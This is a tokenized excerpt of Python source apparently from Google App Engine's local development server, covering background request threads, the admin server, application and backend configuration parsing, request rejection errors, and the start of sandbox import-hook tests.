. _ready_condition . wait ( ) <EOL> return self . _target , self . _args , self . _kwargs <EOL> class _BackgroundRequestsContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _requests = { } <EOL> self . _lock = threading . Lock ( ) <EOL> def _GetOrAddRequest ( self , request_id ) : <EOL> with self . _lock : <EOL> if request_id in self . _requests : <EOL> return self . _requests [ request_id ] <EOL> else : <EOL> request = _BackgroundRequest ( ) <EOL> self . _requests [ request_id ] = request <EOL> return request <EOL> def _RemoveRequest ( self , request_id ) : <EOL> with self . _lock : <EOL> del self . _requests [ request_id ] <EOL> def EnqueueBackgroundThread ( self , request_id , target , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = self . _GetOrAddRequest ( request_id ) <EOL> return request . ProvideCallable ( target , args , kwargs ) <EOL> def RunBackgroundThread ( self , request_id ) : <EOL> """<STR_LIT>""" <EOL> request = self . _GetOrAddRequest ( request_id ) <EOL> target , args , kwargs = request . WaitForCallable ( ) <EOL> self . _RemoveRequest ( request_id ) <EOL> target ( * args , ** kwargs ) <EOL> _pending_background_threads = _BackgroundRequestsContainer ( ) <EOL> def EnqueueBackgroundThread ( request_id , target , args , kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _pending_background_threads . EnqueueBackgroundThread ( <EOL> request_id , target , args , kwargs ) <EOL> def Handle ( environ ) : <EOL> """<STR_LIT>""" <EOL> error = logservice . LogsBuffer ( ) <EOL> request_environment . current_request . Init ( error , environ ) <EOL> response = { '<STR_LIT:error>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> try : <EOL> request_id = environ [ BACKGROUND_REQUEST_ID ] <EOL> _pending_background_threads . RunBackgroundThread ( request_id ) <EOL> return response <EOL> except : <EOL> exception = sys . exc_info ( ) <EOL> tb = exception [ <NUM_LIT:2> ] . tb_next <EOL> if tb : <EOL> tb = tb . tb_next <EOL> message = '<STR_LIT>' . join ( traceback . format_exception ( exception [ <NUM_LIT:0> ] , exception [ <NUM_LIT:1> ] , <EOL> tb ) ) <EOL> logging . error ( message ) <EOL> response [ '<STR_LIT>' ] = <NUM_LIT> <EOL> response [ '<STR_LIT:error>' ] = <NUM_LIT:1> <EOL> return response <EOL> finally : <EOL> request_environment . current_request . Clear ( ) <EOL> response [ '<STR_LIT>' ] = error . parse_logs ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os . path <EOL> import google <EOL> import jinja2 <EOL> import webapp2 <EOL> from google . appengine . tools . devappserver2 . admin import admin_request_handler <EOL> from google . appengine . tools . devappserver2 . admin import blobstore_viewer <EOL> from google . appengine . tools . devappserver2 . admin import console <EOL> from google . appengine . tools . devappserver2 . admin import cron_handler <EOL> from google . appengine . tools . devappserver2 . admin import datastore_indexes_viewer <EOL> from google . appengine . tools . devappserver2 . admin import datastore_stats_handler <EOL> from google . appengine . tools . devappserver2 . admin import datastore_viewer <EOL> from google . appengine . tools . devappserver2 . admin import mail_request_handler <EOL> from google . appengine . tools . devappserver2 . admin import memcache_viewer <EOL> from google . appengine . tools . devappserver2 . admin import quit_handler <EOL> from google . appengine . tools . devappserver2 . admin import search_handler <EOL> from google . appengine . tools . devappserver2 . admin import servers_handler <EOL> from google . appengine . tools . devappserver2 . admin import static_file_handler <EOL> from google . appengine . tools . devappserver2 . admin import taskqueue_queues_handler <EOL> from google . appengine . tools . devappserver2 . admin import taskqueue_tasks_handler <EOL> from google . appengine . tools . devappserver2 . admin import xmpp_request_handler <EOL> from google . appengine . tools . devappserver2 import wsgi_server <EOL> class AdminApplication ( webapp2 . WSGIApplication ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dispatch , configuration ) : <EOL> """<STR_LIT>""" <EOL> super ( AdminApplication , self ) . __init__ ( <EOL> [ ( '<STR_LIT>' , datastore_viewer . DatastoreRequestHandler ) , <EOL> ( '<STR_LIT>' , datastore_viewer . DatastoreEditRequestHandler ) , <EOL> ( '<STR_LIT>' , datastore_viewer . DatastoreEditRequestHandler ) , <EOL> ( '<STR_LIT>' , <EOL> datastore_indexes_viewer . DatastoreIndexesViewer ) , <EOL> ( '<STR_LIT>' , datastore_stats_handler . DatastoreStatsHandler ) , <EOL> ( '<STR_LIT>' , console . ConsoleRequestHandler ) , <EOL> ( '<STR_LIT>' , console . ConsoleRequestHandler . restart ) , <EOL> ( '<STR_LIT>' , memcache_viewer . MemcacheViewerRequestHandler ) , <EOL> ( '<STR_LIT>' , blobstore_viewer . BlobstoreRequestHandler ) , <EOL> ( '<STR_LIT>' , blobstore_viewer . BlobRequestHandler ) , <EOL> ( '<STR_LIT>' , taskqueue_queues_handler . TaskQueueQueuesHandler ) , <EOL> ( '<STR_LIT>' , <EOL> taskqueue_tasks_handler . TaskQueueTasksHandler ) , <EOL> ( '<STR_LIT>' , cron_handler . CronHandler ) , <EOL> ( '<STR_LIT>' , xmpp_request_handler . XmppRequestHandler ) , <EOL> ( '<STR_LIT>' , mail_request_handler . MailRequestHandler ) , <EOL> ( '<STR_LIT>' , quit_handler . QuitHandler ) , <EOL> ( '<STR_LIT>' , search_handler . SearchIndexesListHandler ) , <EOL> ( '<STR_LIT>' , search_handler . SearchDocumentHandler ) , <EOL> ( '<STR_LIT>' , search_handler . SearchIndexHandler ) , <EOL> ( '<STR_LIT>' , static_file_handler . StaticFileHandler ) , <EOL> ( '<STR_LIT>' , servers_handler . ServersHandler ) , <EOL> webapp2 . Route ( '<STR_LIT:/>' , <EOL> webapp2 . RedirectHandler , <EOL> defaults = { '<STR_LIT>' : '<STR_LIT>' } ) ] , <EOL> debug = True ) <EOL> self . dispatcher = dispatch <EOL> self . configuration = configuration <EOL> class AdminServer ( wsgi_server . WsgiServer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , dispatch , configuration , xsrf_token_path ) : <EOL> """<STR_LIT>""" <EOL> self . _host = host <EOL> self . _xsrf_token_path = xsrf_token_path <EOL> super ( AdminServer , self ) . __init__ ( ( host , port ) , <EOL> AdminApplication ( dispatch , configuration ) ) <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> admin_request_handler . AdminRequestHandler . init_xsrf ( self . _xsrf_token_path ) <EOL> super ( AdminServer , self ) . start ( ) <EOL> logging . info ( '<STR_LIT>' , self . _host , <EOL> self . port ) <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( AdminServer , self ) . quit ( ) <EOL> console . ConsoleRequestHandler . quit ( ) </s>
<s> """<STR_LIT>""" <EOL> import errno <EOL> import logging <EOL> import os <EOL> import os . path <EOL> import random <EOL> import string <EOL> import threading <EOL> import types <EOL> from google . appengine . api import appinfo <EOL> from google . appengine . api import appinfo_includes <EOL> from google . appengine . api import backendinfo <EOL> from google . appengine . api import dispatchinfo <EOL> from google . appengine . tools . devappserver2 import errors <EOL> NORMALIZED_LIBRARIES_CHANGED = <NUM_LIT:1> <EOL> SKIP_FILES_CHANGED = <NUM_LIT:2> <EOL> HANDLERS_CHANGED = <NUM_LIT:3> <EOL> INBOUND_SERVICES_CHANGED = <NUM_LIT:4> <EOL> ENV_VARIABLES_CHANGED = <NUM_LIT:5> <EOL> ERROR_HANDLERS_CHANGED = <NUM_LIT:6> <EOL> NOBUILD_FILES_CHANGED = <NUM_LIT:7> <EOL> class ServerConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> _IMMUTABLE_PROPERTIES = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:version>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> def __init__ ( self , yaml_path ) : <EOL> """<STR_LIT>""" <EOL> self . _yaml_path = yaml_path <EOL> self . _app_info_external = None <EOL> self . _application_root = os . path . realpath ( os . path . dirname ( yaml_path ) ) <EOL> self . _last_failure_message = None <EOL> self . _app_info_external , files_to_check = self . _parse_configuration ( <EOL> self . _yaml_path ) <EOL> self . _mtimes = self . _get_mtimes ( [ self . _yaml_path ] + files_to_check ) <EOL> self . _application = self . _app_info_external . application <EOL> self . _api_version = self . _app_info_external . api_version <EOL> self . _server_name = self . _app_info_external . server <EOL> self . _version = self . _app_info_external . version <EOL> self . _threadsafe = self . _app_info_external . threadsafe <EOL> self . _basic_scaling = self . _app_info_external . basic_scaling <EOL> self . _manual_scaling = self . _app_info_external . manual_scaling <EOL> self . _automatic_scaling = self . _app_info_external . automatic_scaling <EOL> self . _runtime = self . _app_info_external . runtime <EOL> if self . _runtime == '<STR_LIT>' : <EOL> logging . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> self . _yaml_path ) <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> @ property <EOL> def application_root ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _application_root <EOL> @ property <EOL> def application ( self ) : <EOL> return self . _application <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _api_version <EOL> @ property <EOL> def server_name ( self ) : <EOL> return self . _server_name or '<STR_LIT:default>' <EOL> @ property <EOL> def major_version ( self ) : <EOL> return self . _version <EOL> @ property <EOL> def version_id ( self ) : <EOL> if self . server_name == '<STR_LIT:default>' : <EOL> return '<STR_LIT>' % ( <EOL> self . major_version , <EOL> self . _minor_version_id ) <EOL> else : <EOL> return '<STR_LIT>' % ( <EOL> self . server_name , <EOL> self . major_version , <EOL> self . _minor_version_id ) <EOL> @ property <EOL> def runtime ( self ) : <EOL> return self . _runtime <EOL> @ property <EOL> def threadsafe ( self ) : <EOL> return self . _threadsafe <EOL> @ property <EOL> def basic_scaling ( self ) : <EOL> return self . _basic_scaling <EOL> @ property <EOL> def manual_scaling ( self ) : <EOL> return self . _manual_scaling <EOL> @ property <EOL> def automatic_scaling ( self ) : <EOL> return self . _automatic_scaling <EOL> @ property <EOL> def normalized_libraries ( self ) : <EOL> return self . _app_info_external . GetNormalizedLibraries ( ) <EOL> @ property <EOL> def skip_files ( self ) : <EOL> return self . _app_info_external . skip_files <EOL> @ property <EOL> def nobuild_files ( self ) : <EOL> return self . _app_info_external . nobuild_files <EOL> @ property <EOL> def error_handlers ( self ) : <EOL> return self . _app_info_external . error_handlers <EOL> @ property <EOL> def handlers ( self ) : <EOL> return self . _app_info_external . handlers <EOL> @ property <EOL> def inbound_services ( self ) : <EOL> return self . _app_info_external . inbound_services <EOL> @ property <EOL> def env_variables ( self ) : <EOL> return self . _app_info_external . env_variables <EOL> @ property <EOL> def is_backend ( self ) : <EOL> return False <EOL> def check_for_updates ( self ) : <EOL> """<STR_LIT>""" <EOL> new_mtimes = self . _get_mtimes ( self . _mtimes . keys ( ) ) <EOL> if new_mtimes == self . _mtimes : <EOL> return set ( ) <EOL> try : <EOL> app_info_external , files_to_check = self . _parse_configuration ( <EOL> self . _yaml_path ) <EOL> except Exception , e : <EOL> failure_message = str ( e ) <EOL> if failure_message != self . _last_failure_message : <EOL> logging . error ( '<STR_LIT>' , failure_message ) <EOL> self . _last_failure_message = failure_message <EOL> return set ( ) <EOL> self . _last_failure_message = None <EOL> self . _mtimes = self . _get_mtimes ( [ self . _yaml_path ] + files_to_check ) <EOL> for app_info_attribute , self_attribute in self . _IMMUTABLE_PROPERTIES : <EOL> app_info_value = getattr ( app_info_external , app_info_attribute ) <EOL> self_value = getattr ( self , self_attribute ) <EOL> if ( app_info_value == self_value or <EOL> app_info_value == getattr ( self . _app_info_external , <EOL> app_info_attribute ) ) : <EOL> continue <EOL> if isinstance ( app_info_value , types . StringTypes ) : <EOL> logging . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> app_info_attribute , <EOL> self_value , <EOL> app_info_value ) <EOL> else : <EOL> logging . warning ( '<STR_LIT>' , <EOL> app_info_attribute ) <EOL> changes = set ( ) <EOL> if ( app_info_external . GetNormalizedLibraries ( ) != <EOL> self . normalized_libraries ) : <EOL> changes . add ( NORMALIZED_LIBRARIES_CHANGED ) <EOL> if app_info_external . skip_files != self . skip_files : <EOL> changes . add ( SKIP_FILES_CHANGED ) <EOL> if app_info_external . nobuild_files != self . nobuild_files : <EOL> changes . add ( NOBUILD_FILES_CHANGED ) <EOL> if app_info_external . handlers != self . handlers : <EOL> changes . add ( HANDLERS_CHANGED ) <EOL> if app_info_external . inbound_services != self . inbound_services : <EOL> changes . add ( INBOUND_SERVICES_CHANGED ) <EOL> if app_info_external . env_variables != self . env_variables : <EOL> changes . add ( ENV_VARIABLES_CHANGED ) <EOL> if app_info_external . error_handlers != self . error_handlers : <EOL> changes . add ( ERROR_HANDLERS_CHANGED ) <EOL> self . _app_info_external = app_info_external <EOL> if changes : <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> return changes <EOL> @ staticmethod <EOL> def _get_mtimes ( filenames ) : <EOL> filename_to_mtime = { } <EOL> for filename in filenames : <EOL> try : <EOL> filename_to_mtime [ filename ] = os . path . getmtime ( filename ) <EOL> except OSError as e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> return filename_to_mtime <EOL> @ staticmethod <EOL> def _parse_configuration ( configuration_path ) : <EOL> with open ( configuration_path ) as f : <EOL> return appinfo_includes . ParseAndReturnIncludePaths ( f ) <EOL> class BackendsConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app_yaml_path , backend_yaml_path ) : <EOL> """<STR_LIT>""" <EOL> self . _update_lock = threading . RLock ( ) <EOL> self . _base_server_configuration = ServerConfiguration ( app_yaml_path ) <EOL> backend_info_external = self . _parse_configuration ( <EOL> backend_yaml_path ) <EOL> self . _backends_name_to_backend_entry = { } <EOL> for backend in backend_info_external . backends or [ ] : <EOL> self . _backends_name_to_backend_entry [ backend . name ] = backend <EOL> self . _changes = dict ( <EOL> ( backend_name , set ( ) ) <EOL> for backend_name in self . _backends_name_to_backend_entry ) <EOL> @ staticmethod <EOL> def _parse_configuration ( configuration_path ) : <EOL> with open ( configuration_path ) as f : <EOL> return backendinfo . LoadBackendInfo ( f ) <EOL> def get_backend_configurations ( self ) : <EOL> return [ BackendConfiguration ( self . _base_server_configuration , self , entry ) <EOL> for entry in self . _backends_name_to_backend_entry . values ( ) ] <EOL> def check_for_updates ( self , backend_name ) : <EOL> """<STR_LIT>""" <EOL> with self . _update_lock : <EOL> server_changes = self . _base_server_configuration . check_for_updates ( ) <EOL> if server_changes : <EOL> for backend_changes in self . _changes . values ( ) : <EOL> backend_changes . update ( server_changes ) <EOL> changes = self . _changes [ backend_name ] <EOL> self . _changes [ backend_name ] = set ( ) <EOL> return changes <EOL> class BackendConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , server_configuration , backends_configuration , <EOL> backend_entry ) : <EOL> """<STR_LIT>""" <EOL> self . _server_configuration = server_configuration <EOL> self . _backends_configuration = backends_configuration <EOL> self . _backend_entry = backend_entry <EOL> if backend_entry . dynamic : <EOL> self . _basic_scaling = appinfo . BasicScaling ( <EOL> max_instances = backend_entry . instances or <NUM_LIT:1> ) <EOL> self . _manual_scaling = None <EOL> else : <EOL> self . _basic_scaling = None <EOL> self . _manual_scaling = appinfo . ManualScaling ( <EOL> instances = backend_entry . instances or <NUM_LIT:1> ) <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> @ property <EOL> def application_root ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _server_configuration . application_root <EOL> @ property <EOL> def application ( self ) : <EOL> return self . _server_configuration . application <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _server_configuration . api_version <EOL> @ property <EOL> def server_name ( self ) : <EOL> return self . _backend_entry . name <EOL> @ property <EOL> def major_version ( self ) : <EOL> return self . _server_configuration . major_version <EOL> @ property <EOL> def version_id ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . server_name , <EOL> self . major_version , <EOL> self . _minor_version_id ) <EOL> @ property <EOL> def runtime ( self ) : <EOL> return self . _server_configuration . runtime <EOL> @ property <EOL> def threadsafe ( self ) : <EOL> return self . _server_configuration . threadsafe <EOL> @ property <EOL> def basic_scaling ( self ) : <EOL> return self . _basic_scaling <EOL> @ property <EOL> def manual_scaling ( self ) : <EOL> return self . _manual_scaling <EOL> @ property <EOL> def automatic_scaling ( self ) : <EOL> return None <EOL> @ property <EOL> def normalized_libraries ( self ) : <EOL> return self . _server_configuration . normalized_libraries <EOL> @ property <EOL> def skip_files ( self ) : <EOL> return self . _server_configuration . skip_files <EOL> @ property <EOL> def nobuild_files ( self ) : <EOL> return self . _server_configuration . nobuild_files <EOL> @ property <EOL> def error_handlers ( self ) : <EOL> return self . _server_configuration . error_handlers <EOL> @ property <EOL> def handlers ( self ) : <EOL> if self . _backend_entry . start : <EOL> return [ appinfo . URLMap ( <EOL> url = '<STR_LIT>' , <EOL> script = self . _backend_entry . start , <EOL> login = '<STR_LIT>' ) ] + self . _server_configuration . handlers <EOL> return self . _server_configuration . handlers <EOL> @ property <EOL> def inbound_services ( self ) : <EOL> return self . _server_configuration . inbound_services <EOL> @ property <EOL> def env_variables ( self ) : <EOL> return self . _server_configuration . env_variables <EOL> @ property <EOL> def is_backend ( self ) : <EOL> return True <EOL> def check_for_updates ( self ) : <EOL> """<STR_LIT>""" <EOL> changes = self . _backends_configuration . check_for_updates ( <EOL> self . _backend_entry . name ) <EOL> if changes : <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> return changes <EOL> class DispatchConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , yaml_path ) : <EOL> self . _yaml_path = yaml_path <EOL> self . _mtime = os . path . getmtime ( self . _yaml_path ) <EOL> self . _process_dispatch_entries ( self . _parse_configuration ( self . _yaml_path ) ) <EOL> @ staticmethod <EOL> def _parse_configuration ( configuration_path ) : <EOL> with open ( configuration_path ) as f : <EOL> return dispatchinfo . LoadSingleDispatch ( f ) <EOL> def check_for_updates ( self ) : <EOL> mtime = os . path . getmtime ( self . _yaml_path ) <EOL> if mtime > self . _mtime : <EOL> self . _mtime = mtime <EOL> try : <EOL> dispatch_info_external = self . _parse_configuration ( self . _yaml_path ) <EOL> except Exception , e : <EOL> failure_message = str ( e ) <EOL> logging . error ( '<STR_LIT>' , failure_message ) <EOL> return <EOL> self . _process_dispatch_entries ( dispatch_info_external ) <EOL> def _process_dispatch_entries ( self , dispatch_info_external ) : <EOL> path_only_entries = [ ] <EOL> hostname_entries = [ ] <EOL> for entry in dispatch_info_external . dispatch : <EOL> parsed_url = dispatchinfo . ParsedURL ( entry . url ) <EOL> if parsed_url . host : <EOL> hostname_entries . append ( entry ) <EOL> else : <EOL> path_only_entries . append ( ( parsed_url , entry . server ) ) <EOL> if hostname_entries : <EOL> logging . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . join ( str ( entry ) for entry in hostname_entries ) ) <EOL> self . _entries = path_only_entries <EOL> @ property <EOL> def dispatch ( self ) : <EOL> return self . _entries <EOL> class ApplicationConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , yaml_paths ) : <EOL> """<STR_LIT>""" <EOL> self . servers = [ ] <EOL> self . dispatch = None <EOL> if len ( yaml_paths ) == <NUM_LIT:1> and os . path . isdir ( yaml_paths [ <NUM_LIT:0> ] ) : <EOL> directory_path = yaml_paths [ <NUM_LIT:0> ] <EOL> for app_yaml_path in [ os . path . join ( directory_path , '<STR_LIT>' ) , <EOL> os . path . join ( directory_path , '<STR_LIT>' ) ] : <EOL> if os . path . exists ( app_yaml_path ) : <EOL> yaml_paths = [ app_yaml_path ] <EOL> break <EOL> else : <EOL> raise errors . AppConfigNotFoundError ( <EOL> '<STR_LIT>' % directory_path ) <EOL> for backends_yaml_path in [ os . path . join ( directory_path , '<STR_LIT>' ) , <EOL> os . path . join ( directory_path , '<STR_LIT>' ) ] : <EOL> if os . path . exists ( backends_yaml_path ) : <EOL> yaml_paths . append ( backends_yaml_path ) <EOL> break <EOL> for yaml_path in yaml_paths : <EOL> if os . path . isdir ( yaml_path ) : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' % <EOL> yaml_path ) <EOL> elif ( yaml_path . endswith ( '<STR_LIT>' ) or <EOL> yaml_path . endswith ( '<STR_LIT>' ) ) : <EOL> self . servers . extend ( <EOL> BackendsConfiguration ( yaml_path . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> yaml_path ) . get_backend_configurations ( ) ) <EOL> elif ( yaml_path . endswith ( '<STR_LIT>' ) or <EOL> yaml_path . endswith ( '<STR_LIT>' ) ) : <EOL> if self . dispatch : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' ) <EOL> self . dispatch = DispatchConfiguration ( yaml_path ) <EOL> else : <EOL> server_configuration = ServerConfiguration ( yaml_path ) <EOL> self . servers . append ( server_configuration ) <EOL> application_ids = set ( server . application <EOL> for server in self . servers ) <EOL> if len ( application_ids ) > <NUM_LIT:1> : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' % <EOL> '<STR_LIT:U+002CU+0020>' . join ( sorted ( application_ids ) ) ) <EOL> self . _app_id = application_ids . pop ( ) <EOL> server_names = set ( ) <EOL> for server in self . servers : <EOL> if server . server_name in server_names : <EOL> raise errors . InvalidAppConfigError ( '<STR_LIT>' % <EOL> server . server_name ) <EOL> server_names . add ( server . server_name ) <EOL> if self . dispatch : <EOL> if '<STR_LIT:default>' not in server_names : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' ) <EOL> missing_servers = ( <EOL> set ( server_name for _ , server_name in self . dispatch . dispatch ) - <EOL> server_names ) <EOL> if missing_servers : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % sorted ( missing_servers ) ) <EOL> @ property <EOL> def app_id ( self ) : <EOL> return self . _app_id </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> _INVALID_ENUM_TEMPLATE = '<STR_LIT>' <EOL> class RequestRejectionError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def message ( self ) : raise NotImplementedError <EOL> def errors ( self ) : raise NotImplementedError <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( { <EOL> '<STR_LIT:error>' : { <EOL> '<STR_LIT>' : self . errors ( ) , <EOL> '<STR_LIT:code>' : <NUM_LIT> , <EOL> '<STR_LIT:message>' : self . message ( ) , <EOL> } , <EOL> } ) <EOL> class EnumRejectionError ( RequestRejectionError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parameter_name , value , allowed_values ) : <EOL> """<STR_LIT>""" <EOL> super ( EnumRejectionError , self ) . __init__ ( ) <EOL> self . parameter_name = parameter_name <EOL> self . value = value <EOL> self . allowed_values = allowed_values <EOL> def message ( self ) : <EOL> """<STR_LIT>""" <EOL> return _INVALID_ENUM_TEMPLATE % ( self . value , self . allowed_values ) <EOL> def errors ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : self . message ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:location>' : self . parameter_name , <EOL> } , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import __builtin__ <EOL> import imp <EOL> import os <EOL> import re <EOL> import sys <EOL> import types <EOL> import urllib <EOL> import unittest <EOL> import google <EOL> try : <EOL> import lxml <EOL> except ImportError : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> try : <EOL> import PIL <EOL> except ImportError : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> import mox <EOL> from google . appengine . tools . devappserver2 import runtime_config_pb2 <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> from google . appengine . tools . devappserver2 . python import stubs <EOL> class SandboxTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SandboxTest , self ) . setUp ( ) <EOL> self . mox = mox . Mox ( ) <EOL> self . old_path = sys . path <EOL> self . old_meta_path = sys . meta_path <EOL> self . old_library_format_string = sandbox . _THIRD_PARTY_LIBRARY_FORMAT_STRING <EOL> self . config = runtime_config_pb2 . Config ( ) <EOL> self . app_root = '<STR_LIT>' <EOL> self . config . application_root = self . app_root <EOL> self . config . app_id = '<STR_LIT>' <EOL> self . config . version_id = '<STR_LIT:1>' <EOL> self . builtins = __builtin__ . __dict__ . copy ( ) <EOL> self . modules = sys . modules . copy ( ) <EOL> def tearDown ( self ) : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( self . modules ) <EOL> __builtin__ . __dict__ . update ( self . builtins ) <EOL> sys . meta_path = self . old_meta_path <EOL> sys . path = self . old_path <EOL> sandbox . _THIRD_PARTY_LIBRARY_FORMAT_STRING = self . old_library_format_string <EOL> self . mox . UnsetStubs ( ) <EOL> super ( SandboxTest , self ) . tearDown ( ) <EOL> def test_enable_libraries ( self ) : <EOL> sandbox . _THIRD_PARTY_LIBRARY_FORMAT_STRING = ( <EOL> '<STR_LIT>' ) <EOL> libs = self . config . libraries <EOL> libs . add ( name = '<STR_LIT:foo>' , version = '<STR_LIT>' ) <EOL> libs . add ( name = '<STR_LIT>' , version = '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> [ os . path . join ( os . path . dirname ( os . path . dirname ( <EOL> google . __file__ ) ) , '<STR_LIT>' ) , <EOL> os . path . join ( os . path . dirname ( os . path . dirname ( <EOL> google . __file__ ) ) , '<STR_LIT>' ) ] , <EOL> sandbox . _enable_libraries ( libs ) ) <EOL> def test_enable_libraries_no_libraries ( self ) : <EOL> libs = self . config . libraries <EOL> self . assertEqual ( [ ] , sandbox . _enable_libraries ( libs ) ) <EOL> self . assertEqual ( self . old_path , sys . path ) <EOL> class ModuleOverrideImportHookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ModuleOverrideImportHookTest , self ) . setUp ( ) <EOL> self . test_policies = { } <EOL> self . path = sys . path [ : ] <EOL> self . hook = sandbox . ModuleOverrideImportHook ( self . test_policies ) <EOL> sys . path_importer_cache = { } <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> __import__ ( '<STR_LIT>' ) . __path__ . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> self . imported_modules = set ( sys . modules ) <EOL> self . path_hooks = sys . path_hooks <EOL> def tearDown ( self ) : <EOL> sys . path_hooks = self . path_hooks <EOL> sys . path_importer_cache = { } <EOL> sys . path = self . path <EOL> added_modules = set ( sys . modules ) - self . imported_modules <EOL> for name in added_modules : <EOL> del sys . modules [ name ] <EOL> distutils_modules = [ module for module in sys . modules if <EOL> module . startswith ( '<STR_LIT>' ) ] <EOL> for name in distutils_modules : <EOL> del sys . modules [ name ] <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> super ( ModuleOverrideImportHookTest , self ) . tearDown ( ) <EOL> def test_load_builtin_pass_through ( self ) : <EOL> symbols = dir ( __import__ ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> thread = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( thread , types . ModuleType ) ) <EOL> self . assertTrue ( isinstance ( thread . __doc__ , str ) ) <EOL> self . assertItemsEqual ( symbols + [ '<STR_LIT>' ] , dir ( thread ) ) <EOL> self . assertEqual ( self . hook , thread . __loader__ ) <EOL> def test_load_builtin_no_pass_through ( self ) : <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = False ) <EOL> thread = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( thread , types . ModuleType ) ) <EOL> self . assertItemsEqual ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dir ( thread ) ) <EOL> self . assertEqual ( self . hook , thread . __loader__ ) <EOL> def test_load_with_path_hook ( self ) : <EOL> class DummyPathHook ( object ) : <EOL> def __init__ ( self , path ) : <EOL> if path != '<STR_LIT>' : <EOL> raise ImportError <EOL> def find_module ( self , unused_fullname ) : <EOL> return self <EOL> def load_module ( self , fullname ) : <EOL> return imp . new_module ( '<STR_LIT>' % fullname ) <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> sys . path_hooks = [ DummyPathHook ] <EOL> util = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , util . __name__ ) <EOL> def test_load_with_path_hook_cant_find ( self ) : <EOL> class DummyPathHook ( object ) : <EOL> def __init__ ( self , path ) 